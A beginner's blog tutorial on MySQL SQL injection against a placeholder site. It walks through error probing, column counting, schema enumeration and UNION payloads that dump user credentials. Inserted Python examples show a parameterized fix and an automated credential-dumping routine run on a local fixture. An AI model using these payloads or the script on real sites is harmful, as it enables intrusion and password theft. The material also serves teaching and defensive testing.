Saturday, 1 June 2013

Here is a n00b's guide to SQL injection, written by a n00b. In my last tutorial I wrote about some ways to make your way into hacking. Hacking is a broad term which includes far too much, so for now we are learning web application pentesting and hacking. We are going to start with the most basic and common attack, SQL injection. Before starting, let me say that I am not very good at writing easy-to-understand tutorials, because I tend to assume the reader can already follow along to some extent.

Content we are going to discuss:
  1. Basics of SQL injection
  2. Testing for SQL injection
  3. Commenting out the query
  4. Getting the number of columns
  5. Collecting information with default variables and functions
  6. Types of injections
  7. Interesting places to inject
    • GET parameter
    • POST parameter
    • Referer header
    • User-Agent header
    • Cookie
  8. Tampering with the file system using SQL injection
  9. Uploading a shell using SQL injection
  10. Automated and manual testing tools
    • SQLmap
    • Havij
    • SQLninja
    • SQL Poizon
    • Dark Jumper
    • Enema 1.71
    • SQLI-Hunter
    • FatCat Auto SQL Injection
    • Pangolin
    • The Mole
    • BSQL Hacker
    • Safe3SI
    • ZAP Proxy
    • Burp Suite
    • W3AF
    • Uniscan
  11. Bypassing blacklist filters
  12. Bypassing the WAF (Web Application Firewall)
  13. SiXSS/XSSQLi attack
  14. SiPhish attack
  15. SiLFI (Local File Inclusion via SQLi)
  16. SiRFI (Remote File Inclusion via SQLi)
  17. SiRCE (Remote Code Execution via SQLi)
  18. SiDDoS (DDoSing via SQLi)
  19. SiHRS attack
I am not going to cover the whole list above in this tutorial. Here we will discuss the basics; the rest of the tutorials I will be adding later.

Basics of SQL injection

SQL injection is an attack in which the attacker targets the database behind a website in order to own it. Keep in mind that SQL injection is not a direct attack on the DBMS, and it is not a vulnerability in the database software. SQL injection is a vulnerability in the web application, i.e. on the developer's side. When input provided by the user is inserted into the query text without proper validation (or, better, without being passed as a bound parameter), the attacker gets the opportunity to inject his own SQL, change what the query does and tamper with its output.

Basic example of the reason behind the vulnerability:

I am not going to go deep into it, just a small example.

www.vuln-website.com/findme.php?id=48

Let's say the query used inside the code is
Select username from users where id=<input here>

With the normal request the query becomes
Select username from users where id=48

So what if the attacker injects something like
www.vuln-website.com/findme.php?id=48'

It will make the query become
Select username from users where id=48'

which will now give an error:
You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the
right syntax to use near ''' at line 1

So now if he injects something like "-48 union select database()", the query becomes
Select username from users where id=-48 union select database()

There is no row with id -48, so the only row returned is the one the attacker added with UNION, and he gets the database name printed where a username should be. In this way he can tamper with the request and dump the database. So now let us start.
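To make the point concrete, here is an added example (my own code, not from the original post) of the bug above next to its fix. It uses an in-memory sqlite3 database as a stand-in for the site's MySQL backend so it runs offline, with invented rows; since sqlite has no database() function, sqlite_version() plays the role of the function the attacker smuggles into the query. The lookup functions and the payload runner are hypothetical names for what findme.php would do.

```python
import sqlite3

# Constructed stand-in for findme.php's backend: an in-memory sqlite3 database
# instead of MySQL so the example runs offline. The rows are invented.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(48, "alice"), (49, "bob")])
    return db

def lookup_vulnerable(db, user_input):
    # The bug: the id parameter is pasted into the query text, so whatever the
    # user sends becomes part of the SQL that runs.
    sql = "SELECT username FROM users WHERE id=" + user_input
    return [row[0] for row in db.execute(sql)]

def lookup_safe(db, user_input):
    # The fix: check that id really is a number, then pass it as a bound
    # parameter. The value can never change the shape of the query.
    try:
        id_value = int(user_input)
    except ValueError:
        return []
    return [row[0] for row in db.execute(
        "SELECT username FROM users WHERE id=?", (id_value,))]

def run_payload(lookup, payload):
    """Run one request against a fresh database and report either
    ('ok', rows) or ('error', message), which is what shows up on the page."""
    db = make_db()
    try:
        return ("ok", lookup(db, payload))
    except sqlite3.Error as e:
        return ("error", str(e))

if __name__ == "__main__":
    # 48 -> normal page; 48' -> syntax error; -48 union ... -> injected row
    for payload in ("48", "48'", "-48 union select sqlite_version()"):
        print(repr(payload),
              "vulnerable:", run_payload(lookup_vulnerable, payload),
              "safe:", run_payload(lookup_safe, payload))
```

The vulnerable lookup leaks the version string in place of a username and throws a syntax error on the stray quote; the safe lookup returns the same row for 48 and nothing at all for either payload, because the input is only ever data.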

Testing for SQL Injection

While injecting SQL into a web application, our first goal is to understand the database type and the query we are injecting into, so that we can figure out the right payloads to use. In this tutorial I am sticking with MySQL; most of it applies to other databases too, with small changes in the injection syntax. I will soon be posting about other databases as well.



Let us take this URL as an example:
www.vuln-website.com/lol.php?ssid=1

To identify the backend database we will first try to provoke an error from the query, since the error message usually names the database. We start by appending some characters to the parameter that break the query's syntax.

Example:
www.vuln-website.com/lol.php?ssid=1'
www.vuln-website.com/lol.php?ssid=1"
www.vuln-website.com/lol.php?ssid=1/
If the input is not properly sanitized, this will produce an error. Keep in mind that the error is only visible if the application prints database errors on the page; if it does not, the injection may still be there, but you will have to detect it from changes in the page content or response time instead (that is covered under types of injections).

Following are some errors from different Database types:

MySql:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1

Oracle:
ORA-00933: SQL command not properly ended

MS SQL Server:
Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string

PostgreSQL:
Query failed: ERROR: syntax error at or near "’" at character 56 in shit.php on line 20.

Let us assume we got the first error, the MySQL one. Now we will try to comment out the rest of the query, so that we can inject our own SQL without any complications. But before that, it is very important to read the error carefully so that you understand how to close the given input: check the error and see what is used in the statement on both sides of the input, so that you can balance the query (for example, whether the value is inside single quotes, double quotes or parentheses).

Commenting Out the Query

--      : SQL comment (in MySQL the two dashes must be followed by whitespace)
--+     : the same MySQL comment; the + decodes to a space in a URL
-- -    : the same trick, a space followed by a harmless dash
#       : MySQL hash comment (MySQL only)
/*      : C-style comment (MySQL also treats /*! ... */ as executable, which matters for filter bypasses)
;       : statement terminator, used for stacked queries where the database driver allows them (not a null byte; the null byte is %00)
`       : backtick, MySQL's identifier quote, useful when the input lands inside a table or column name

www.vuln-website.com/lol.php?ssid=1'--+
www.vuln-website.com/lol.php?ssid=1'-- -
www.vuln-website.com/lol.php?ssid=1'#

Usually one of these will work and the page will stop showing an error. We just need to stick with the one that works and continue with the injection.

Getting the Columns

Here is the first request we would build:

www.vuln-website.com/lol.php?ssid=1+ORDER+BY+1--+

If the page loads normally, that indicates the query has at least one column. We keep increasing the ORDER BY number until the page errors out, which proves we have gone past the last column. The trick is simply to repeat until you find the count that errors.

www.vuln-website.com/lol.php?ssid=1+ORDER+BY+2--+                    (no error on page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+3--+                    (no error on page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+4--+                    (no error on page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+5--+                    (no error on page)
www.vuln-website.com/lol.php?ssid=1+ORDER+BY+6--+                    (error found)

So that means we have 5 columns, the last number that did not give an error. (Writing ORDER BY 1,2,3,4,5 works the same way; a single number is enough.) Now let's check which of the columns is printed on the web page. We use -1 as the id so that the original query returns no row and only our UNION row is displayed:

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,3,4,5--+

Let's assume we can see 3 on the web page. So from now on we will be injecting into the third column.

Now comes the best part of injection :D

Collecting Information with Default Variables and Functions

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,database(),4,5--

As you can see, I replaced 3 with "database()", a built-in function which returns the name of the current database. In the same manner I can use the following functions and variables to get more information about the server (the @@ names are system variables, the others are functions):

  • @@hostname
  • @@tmpdir
  • @@datadir
  • @@version
  • @@basedir
  • @@version_compile_os
  • user()
  • database()
  • version()
  • schema()
  • UUID()
  • current_user()
  • current_user
  • system_user()
  • session_user()

Basic Injection (Union Based, Multiple Rows)

Now let us start dumping data using union based injection. To start, let's see all the databases visible to the current user.


www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,schema_name,4,5+from+information_schema.schemata--+

Now to get the list of tables in the current database:

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,table_name,4,5+from+information_schema.tables+where+table_schema=database()--+

Let's say we got the following tables:
  • Posts
  • Assets
  • Banner
  • Links
  • Users

The most interesting of these is Users, so we will dump it. First we need its column names:

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,column_name,4,5+from+information_schema.columns+where+table_schema=database()+and+table_name='users'--+

Let's say we got the following columns:
  • id
  • username
  • password

To dump all usernames and passwords in one request our query will be

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,group_concat(username,0x3a,password),4,5+from+users--+

(0x3a is the hex for ':', used as a separator because a literal quote might be filtered.) Note that only one row can be shown per printed column, which is why group_concat is used to pack many rows into one value. If you can't get everything in one query (group_concat output is limited by group_concat_max_len), you can use LIMIT to fetch the rows one by one:

www.vuln-website.com/lol.php?ssid=-1+Union+Select+1,2,concat(username,0x3a,password),4,5+from+users+limit+0,1--+

Keep increasing the 0 to 1, 2, 3, 4 ... n to iterate through each row. Death Row injection and Evil Twin injection are other techniques for such cases.
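The column-counting, column-finding and row-by-row dumping steps above are mechanical, which is why tools automate them. Here is an added example (my own code, not from the original post) that runs the whole procedure against a constructed stand-in for lol.php: an in-memory sqlite3 database with a five-column posts table and a users table of invented rows, and a page() function that pastes the ssid parameter into the query and prints only columns 2 and 4. sqlite has no information_schema and no concat(), so the dump uses || where MySQL would use concat(username,0x3a,password); everything else (ORDER BY n until error, UNION SELECT with markers, LIMIT offset,1) is the same technique the text describes.

```python
import re
import sqlite3

# Constructed fixture: sqlite3 standing in for the site's MySQL backend.
# The posts table has 5 columns (the page's "5 columns"); the rows are invented.
def make_site():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER, title TEXT, body TEXT, author TEXT, tags TEXT)")
    db.execute("INSERT INTO posts VALUES (1, 'Welcome', 'first post', 'admin', 'news')")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "hash1"), (2, "bob", "hash2")])
    return db

def page(db, ssid):
    """Hypothetical stand-in for lol.php?ssid=...: concatenates the parameter
    into the query and renders only title and author (columns 2 and 4).
    Returns None when the database raised an error, i.e. when the real page
    would print a MySQL error instead of content."""
    sql = "SELECT id, title, body, author, tags FROM posts WHERE id=" + ssid
    try:
        rows = db.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return " ".join(f"{r[1]} by {r[3]}" for r in rows)

def count_columns(db, max_cols=20):
    """ORDER BY n succeeds while n <= number of columns and errors beyond it."""
    for n in range(1, max_cols + 1):
        if page(db, f"1 ORDER BY {n}--") is None:
            return n - 1
    return None  # more columns than we tried

def find_reflected(db, ncols):
    """UNION a row of distinct markers; the markers that appear on the page
    tell us which columns we can read data through."""
    markers = ",".join(f"'col{i}'" for i in range(1, ncols + 1))
    out = page(db, f"-1 UNION SELECT {markers}--") or ""
    return [i for i in range(1, ncols + 1) if f"col{i}" in out]

def dump_users(db, ncols, col):
    """Row-by-row extraction with LIMIT offset,1 through one reflected column.
    The value is wrapped in [[ ]] so it can be cut out of the surrounding page."""
    found = []
    offset = 0
    while True:
        cols = ["'x'"] * ncols
        cols[col - 1] = "'[['||username||':'||password||']]'"
        payload = f"-1 UNION SELECT {','.join(cols)} FROM users LIMIT {offset},1--"
        m = re.search(r"\[\[(.*?)\]\]", page(db, payload) or "")
        if not m:
            return found  # no more rows (or the page errored)
        found.append(m.group(1))
        offset += 1

if __name__ == "__main__":
    site = make_site()
    n = count_columns(site)
    shown = find_reflected(site, n)
    print("columns:", n, "reflected:", shown)
    print("users:", dump_users(site, n, shown[0]))
```

Against a real target, page() would be an HTTP request and the "error" signal would be a substring match on the MySQL error text or a change in page length; the loop structure stays the same.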

For now that is all. I will be adding the other tutorials listed above soon.

Till then Happy Hacking :)

NOTE: Any suggestions or help are highly appreciated.
